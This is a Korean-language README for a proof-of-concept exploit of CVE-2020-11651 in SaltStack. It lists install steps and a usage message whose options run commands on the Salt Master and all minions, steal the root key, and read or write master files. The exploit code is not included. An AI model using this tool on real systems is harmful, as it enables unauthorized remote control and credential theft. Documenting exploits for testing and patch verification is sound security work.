
CVE-2020-11651용 PoC
CVE-2020-11651에 대한 PoC
Python3 필요, 3.8에서 테스트 완료
python3.8 -m pip install pyzmq msgpack
⇒ python3.8 poc.py -h
usage: poc.py [-h] [-p PORT] [-c CMD] [-k] [-m] [-r READ] [-w WRITE] [-f FILE] server [server ...]
Exploit CVE-2020-11651
positional arguments:
server 대상 서버 IP 또는 호스트
optional arguments:
-h, --help 이 도움말 메시지를 표시하고 종료
-p PORT, --port PORT 대상 포트 (기본값=4506)
-c CMD, --cmd CMD 실행할 명령어
-k, --key 루트 키 가져오기
-m, --minions 모든 활성 미니언에서 CMD 실행
-r READ, --read READ Salt Master에서 파일 읽기
-w WRITE, --write WRITE
Salt Master에 파일 쓰기
-f FILE, --file FILE --write와 함께 사용, Salt Master에 쓸 로컬 파일
예시: poc.py -k 127.0.0.1 (루트 키 읽기)